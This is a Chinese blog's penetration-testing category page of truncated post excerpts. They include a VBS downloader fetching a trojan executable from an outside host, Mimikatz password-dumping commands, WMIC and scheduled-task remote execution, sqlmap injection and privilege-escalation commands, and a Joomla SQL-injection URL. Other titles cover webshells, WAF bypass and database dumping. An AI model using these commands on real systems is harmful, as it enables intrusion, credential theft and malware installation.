随笔分类 -  渗透测试

上一页 1 2 3 4 5 6 下一页
各种渗透经验
dnslog注入
摘要:使用Powershell反弹Meterpreter Shell cloudeye在windows下的应用 今天突发奇想的一个姿势,算不上什么技巧,分享一下吧。 看到有人问过。http://zone.wooyun.org/content/27440 其实很羡慕linxu的curl `whoami`.x 阅读全文
posted @ 2016-12-21 12:16 Hookjoy 阅读(481) 评论(0) 推荐(0)
Shell下突破安全狗远程桌面守护
摘要:首先在Shell下把安全狗的安装配置给下来 默认安装路径: C:\Program Files\SafedogServer\SafeDogGuardCenter 找到 ProGuardData.ini 下载文件到本地虚拟机 虚拟机安装安全狗 然后文件覆盖一下 打开安全狗就可以看到的鸟....计算机名字 阅读全文
posted @ 2016-11-05 12:28 Hookjoy 阅读(341) 评论(0) 推荐(0)
sqlmap http头注入的一个技巧
摘要:sqlmap.py -u “url” --host * --thread=1 --batch -v 1 --delay=0.7 --dbms mysql --current-db --current-user --dbs https://forum.90sec.org/forum.php?mod=v 阅读全文
posted @ 2016-10-14 14:05 Hookjoy 阅读(1119) 评论(0) 推荐(0)
PHP DOS漏洞的新利用:CVE-2015-4024 Reviewed
摘要:1. 背景介绍 今天我们想从2015.04.03的一个PHP远程dos漏洞(CVE-2015-4024)说起。技术细节见如下链接,https://bugs.php.net/bug.php?id=69364。因为php解析body part的header时进行字符串拼接,而拼接过程重复拷贝字符导致DO 阅读全文
posted @ 2016-10-12 21:18 Hookjoy 阅读(690) 评论(0) 推荐(0)
利用sqlmap进行mysql提权的小方法(win与liunx通用)
摘要:文章作者:pt007@vip.sina.com文章来源:https://www.t00ls.net/thread-36196-1-1.html1.连接mysql数据打开一个交互shell:sqlmap.py -d mysql://root:root@127.0.0.1:3306/test --sql 阅读全文
posted @ 2016-10-12 12:45 Hookjoy 阅读(5560) 评论(0) 推荐(0)
星外Xday提权
摘要:在星外不是安全模式的时候 但是又没有执行目录 有时候远程调用也不行对吧 winrar 有执行权限的时候C:\windows\IIS Temporary Compressed Files\ 这个目录有点特殊。如果你直接在shell上操作 上传 下载 复制 移动到这目录是没有权限的但是大牛说的 如果有w 阅读全文
posted @ 2016-10-01 16:52 Hookjoy 阅读(319) 评论(0) 推荐(0)
Windows内网渗透提权的几个实用命令
摘要:这不是一篇渗透测试指导,而是简单介绍了几个Windows内网提权的实用命令,以供我等菜鸟学习观摩,还望大牛包涵指导。 1.获取操作系统信息 识别操作系统名称及版本: 当然中文系统你得这样: 识别系统体系结构: C:\Users\thel3l> echo %PROCESSOR_ARCHITECTURE 阅读全文
posted @ 2016-09-24 21:10 Hookjoy 阅读(2885) 评论(0) 推荐(0)
WAF攻防研究之四个层次Bypass WAF
摘要:从架构、资源、协议和规则4个层次研究绕过WAF的技术,助于全方位提升WAF防御能力。 绕过WAF的相关技术研究是WAF攻防研究非常重要的一部分,也是最有趣的部分,所以我在写WAF攻防时先写攻击部分。还是那句老话“不知攻焉知防”,如果连绕过WAF方法都不知道,怎么保证WAF能保护后端服务的安全。在我看 阅读全文
posted @ 2016-08-17 01:04 Hookjoy 阅读(8810) 评论(0) 推荐(4)
SQLServer注入技巧
摘要:一、对于SA权限的用户执行命令,如何获取更快捷的获取结果? 有显示位 无显示位 其实这里的关键并不是有无显示位。exec master..xp_cmdshell 'systeminfo'生成的数据写进一张表的时候,会产生很多行。而我们要做的就是如何很多行通过显示位、或者报错语句一次性爆出来,这里的关 阅读全文
posted @ 2016-06-22 19:04 Hookjoy 阅读(940) 评论(0) 推荐(0)
使用powershell提权的一些技巧
摘要:原文:http://fuzzysecurity.com/tutorials/16.html 翻译:http://www.myexception.cn/windows/1752546.html https://raw.githubusercontent.com/PowerShellEmpire/Pow 阅读全文
posted @ 2016-06-21 16:16 Hookjoy 阅读(1088) 评论(0) 推荐(0)
wget.aspx 脱裤
只有注册用户登录后才能阅读该文。
posted @ 2016-04-20 16:11 Hookjoy 阅读(4) 评论(0) 推荐(0)
【ASP】] 拖库其实很简单
只有注册用户登录后才能阅读该文。
posted @ 2016-04-20 16:09 Hookjoy 阅读(7) 评论(0) 推荐(0)
webshell下执行命令脚本汇集
摘要:cmd1.asp cmd2.asp cmd.jsp cmd.cgi cmd.cfm cmd1.php cmd2.php cmd1.aspx cmd2.aspx cmd3.aspx 阅读全文
posted @ 2016-03-17 02:12 Hookjoy 阅读(4841) 评论(0) 推荐(0)
PHP filesystem attack vectors - Take Two
摘要:http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/ Did you enjoyed our previous "PHP filesystem attack vectors" research? This is th 阅读全文
posted @ 2016-02-24 15:46 Hookjoy 阅读(299) 评论(0) 推荐(0)
PHP filesystem attack vectors
摘要:http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/ On Apr 07, 2008 I spoke with Kuza55 and Wisec about an attack I found some time before tha 阅读全文
posted @ 2016-02-24 15:46 Hookjoy 阅读(411) 评论(0) 推荐(0)
vbs下载者
摘要:一、VBS下载者:Set Post = CreateObject("Msxml2.XMLHTTP")Set Shell = CreateObject("Wscript.Shell")Post.Open "GET","http://www.03389.com/muma.exe",0Post.Send(... 阅读全文
posted @ 2015-10-29 12:01 Hookjoy 阅读(750) 评论(0) 推荐(0)
内网渗透的一些小总结(长期更新)
摘要:WMIC远程运行命令wmic /node:host /user:administrator /p 密码 process call create “c:\windows\temp\foobar.exe”schtasks计划任务远程运行schtasks /create /tn foobar /tr c:... 阅读全文
posted @ 2015-10-24 13:16 Hookjoy 阅读(425) 评论(0) 推荐(0)
Joomla 3.2.0 - 3.4.4 无限制SQL注入漏洞
摘要:http://www.sebug.net/vuldb/ssvid-89680#0-tsina-1-18081-397232819ff9a47a7b7e80a40613cfe1http://10.211.55.3/joomla/index.php?option=com_contenthistory&v... 阅读全文
posted @ 2015-10-24 01:42 Hookjoy 阅读(417) 评论(0) 推荐(0)
浅谈内网渗透
摘要:引子离上篇文章的时间过去很久了,答应写一篇内网渗透的文章,今天抽点时间,把这个坑给添平了吧。标题是浅谈,所以我不认为自己能在内网渗透写的有多深入。渗透这玩意更多是经验,积累的多了自然水到渠成。而且我个人认为很多前辈人物都已经写的很好了,我这里纯粹抛砖引玉,把前辈级人物的经验集成在一起,也算基础篇吧。... 阅读全文
posted @ 2015-10-22 18:27 Hookjoy 阅读(467) 评论(0) 推荐(0)
Mimikatz 使用Tips
摘要:1.记录 Mimikatz输出: C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir2.将输出导入到本地文件: C:\>mimikatz.exe ""privilege::de 阅读全文
posted @ 2015-09-20 00:06 Hookjoy 阅读(2619) 评论(0) 推荐(0)

上一页 1 2 3 4 5 6 下一页